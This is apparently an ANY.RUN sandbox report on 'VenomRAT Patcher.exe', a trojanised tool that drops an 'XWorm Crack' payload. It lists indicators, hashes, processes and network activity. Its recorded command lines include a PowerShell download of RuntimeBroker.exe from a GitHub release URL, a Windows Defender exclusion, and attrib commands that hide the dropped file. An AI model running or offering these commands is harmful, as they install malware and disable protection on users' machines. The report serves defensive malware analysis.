File name:

VenomRAT Patcher.exe

Full analysis: https://app.any.run/tasks/6f9f6d32-2b90-480d-b87b-aa6836dce09d
Verdict: Malicious activity
Analysis date: May 17, 2025, 05:29:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5:

07C653D74342733B925F3CE700A75604

SHA1:

3EBBECF91881F8D666E74211C0C9662CFDB6B1DF

SHA256:

F949F581B93CB366EBF915797331A45FDF856B123ECAEEF8BDB42D5F0DDBDFE8

SSDEEP:

98304:CCYzBnbSb4Y6ZhkDQet54nHZUj0vU9XLDbenkuA83wpYp2twldaQ0EACheua5DRC:sp2z881mwH/kit496ikY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6488)
      • powershell.exe (PID: 6944)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 1052)
      • powershell.exe (PID: 6040)
      • powershell.exe (PID: 6228)
      • powershell.exe (PID: 5204)
      • powershell.exe (PID: 1600)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 6736)
      • powershell.exe (PID: 2288)
      • powershell.exe (PID: 1760)
      • powershell.exe (PID: 5084)

    • Changes Windows Defender settings

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • VenomRAT Patcher.exe (PID: 2656)
      • powershell.exe (PID: 1852)

    • Process drops python dynamic module

      • VenomRAT Patcher.exe (PID: 2656)

    • Executable content was dropped or overwritten

      • VenomRAT Patcher.exe (PID: 2656)
      • powershell.exe (PID: 1852)
      • RuntimeBroker.exe (PID: 6132)

    • The process drops C-runtime libraries

      • VenomRAT Patcher.exe (PID: 2656)

    • Application launched itself

      • VenomRAT Patcher.exe (PID: 2656)

    • Loads Python modules

      • VenomRAT Patcher.exe (PID: 4224)

    • Starts CMD.EXE for commands execution

      • VenomRAT Patcher.exe (PID: 4224)
      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)

    • Executing commands from a ".bat" file

      • VenomRAT Patcher.exe (PID: 4224)
      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)

    • The process executes VB scripts

      • cmd.exe (PID: 1300)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5552)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)

    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)

    • Reads the date of Windows installation

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Executes application which crashes

      • XWorm V5.6 Crack.exe (PID: 3676)
      • XWorm V5.6 Crack.exe (PID: 5244)
      • XWorm V5.6 Crack.exe (PID: 1628)
      • XWorm V5.6 Crack.exe (PID: 2320)
      • XWorm V5.6 Crack.exe (PID: 6760)
      • XWorm V5.6 Crack.exe (PID: 6632)
      • XWorm V5.6 Crack.exe (PID: 444)
      • XWorm V5.6 Crack.exe (PID: 2064)
      • XWorm V5.6 Crack.exe (PID: 3884)
      • XWorm V5.6 Crack.exe (PID: 6640)
      • XWorm V5.6 Crack.exe (PID: 1600)
      • XWorm V5.6 Crack.exe (PID: 5984)

    • Reads security settings of Internet Explorer

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

  • INFO

    • Reads the computer name

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)

    • Checks supported languages

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)

    • The sample compiled with english language support

      • VenomRAT Patcher.exe (PID: 2656)

    • Create files in a temporary directory

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Checks proxy server information

      • VenomRAT Patcher.exe (PID: 4224)
      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 872)
      • powershell.exe (PID: 2800)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 2800)

    • Disables trace logs

      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)

    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)

    • Process checks computer location settings

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2800)
      • WerFault.exe (PID: 672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:17 04:50:08+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 173568
InitializedDataSize: 101888
UninitializedDataSize: -
EntryPoint: 0xce30
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
295
Monitored processes
149
Malicious processes
26
Suspicious processes
0

Behavior graph

Click at the process to see the details
start venomrat patcher.exe venomrat patcher.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs sppextcomobj.exe no specs slui.exe cacls.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs slui.exe attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe runtimebroker.exe no specs attrib.exe no specs xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
300attrib +h "C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
444"C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe" C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe
RuntimeBroker.exe
User:
admin
Company:
@ThreatCommunity
Integrity Level:
HIGH
Description:
XWorm by @ThreatCommunity
Exit code:
3762504530
Version:
5.6.0.0
Modules
Images
c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
444RuntimeBroker.exe C:\Users\admin\AppData\Local\Anon\RuntimeBroker.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Update Assistant
Exit code:
0
Version:
10.0.18362.1
Modules
Images
c:\users\admin\appdata\local\anon\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
664powershell.exe -command "Add-MpPreference -ExclusionPath "C:\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
672C:\WINDOWS\system32\WerFault.exe -u -p 5244 -s 932C:\Windows\System32\WerFault.exeXWorm V5.6 Crack.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
680\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
864"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
872Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
924\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
211 809
Read events
211 717
Write events
56
Delete events
36

Modification events

(PID) Process:(1300) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:ProgramId
Value:
00064ee32d88d6ce3eb386c7e88f7c8d705600000000
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:FileId
Value:
00003547dfaa6e524a367aff90b685bdb5e728c1bfeb
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:LowerCaseLongPath
Value:
c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:LongPathHash
Value:
xworm v5.6 crack|b448236e62d20cab
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Name
Value:
XWorm V5.6 Crack.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:OriginalFileName
Value:
xworm.exe
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Publisher
Value:
@threatcommunity
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:Version
Value:
5.6.0.0
(PID) Process:(2800) WerFault.exeKey:\REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation:writeName:BinFileVersion
Value:
5.6.0.0
Executable files
57
Suspicious files
27
Text files
93
Unknown types
0

Dropped files

PID
Process
Filename
Type
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-fibers-l1-1-0.dllexecutable
MD5:B5E2760C5A46DBEB8AE18C75F335707E
SHA256:91D249D7BC0E38EF6BCB17158B1FDC6DD8888DC086615C9B8B750B87E52A5FB3
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-fibers-l1-1-1.dllexecutable
MD5:050A30A687E7A2FA6F086A0DB89AA131
SHA256:FC9D86CEC621383EAB636EBC87DDD3F5C19A3CB2A33D97BE112C051D0B275429
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-debug-l1-1-0.dllexecutable
MD5:226A5983AE2CBBF0C1BDA85D65948ABC
SHA256:591358EB4D1531E9563EE0813E4301C552CE364C912CE684D16576EABF195DC3
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_socket.pydexecutable
MD5:566CB4D39B700C19DBD7175BD4F2B649
SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\_lzma.pydexecutable
MD5:D63E2E743EA103626D33B3C1D882F419
SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-console-l1-1-0.dllexecutable
MD5:9F746F4F7D845F063FEA3C37DCEBC27C
SHA256:88ACE577A9C51061CB7D1A36BABBBEFA48212FADC838FFDE98FDFFF60DE18386
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-datetime-l1-1-0.dllexecutable
MD5:8F8EB9CB9E78E3A611BC8ACAEC4399CB
SHA256:1BD81DFD19204B44662510D9054852FB77C9F25C1088D647881C9B976CC16818
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-file-l1-1-0.dllexecutable
MD5:9F45A47EBFD9D0629F4935764243DD5A
SHA256:1CA895ABA4E7435563A6B43E85EBA67A0F8C74AA6A6A94D0FC48FA35535E2585
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-errorhandling-l1-1-0.dllexecutable
MD5:C2F8C03ECCE9941492BFBE4B82F7D2D5
SHA256:D56CE7B1CD76108AD6C137326EC694A14C99D48C3D7B0ACE8C3FF4D9BCEE3CE8
2656VenomRAT Patcher.exeC:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-file-l2-1-0.dllexecutable
MD5:E368A236F5676A3DA44E76870CD691C9
SHA256:93C624B366BA16C643FC8933070A26F03B073AD0CF7F80173266D67536C61989
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
50
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
304
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
304
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
2384
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
4224
VenomRAT Patcher.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
4224
VenomRAT Patcher.exe
185.199.109.133:443
objects.githubusercontent.com
FASTLY
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 51.124.78.146
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.42
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
github.com
  • 140.82.121.4
  • 140.82.121.3
whitelisted
objects.githubusercontent.com
  • 185.199.109.133
  • 185.199.110.133
  • 185.199.111.133
  • 185.199.108.133
whitelisted
login.live.com
  • 40.126.31.69
  • 40.126.31.73
  • 40.126.31.2
  • 40.126.31.0
  • 20.190.159.64
  • 20.190.159.73
  • 40.126.31.129
  • 40.126.31.130
  • 20.190.159.131
  • 20.190.159.68
  • 20.190.159.75
  • 20.190.159.23
  • 20.190.159.0
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
VenomRAT Patcher.exe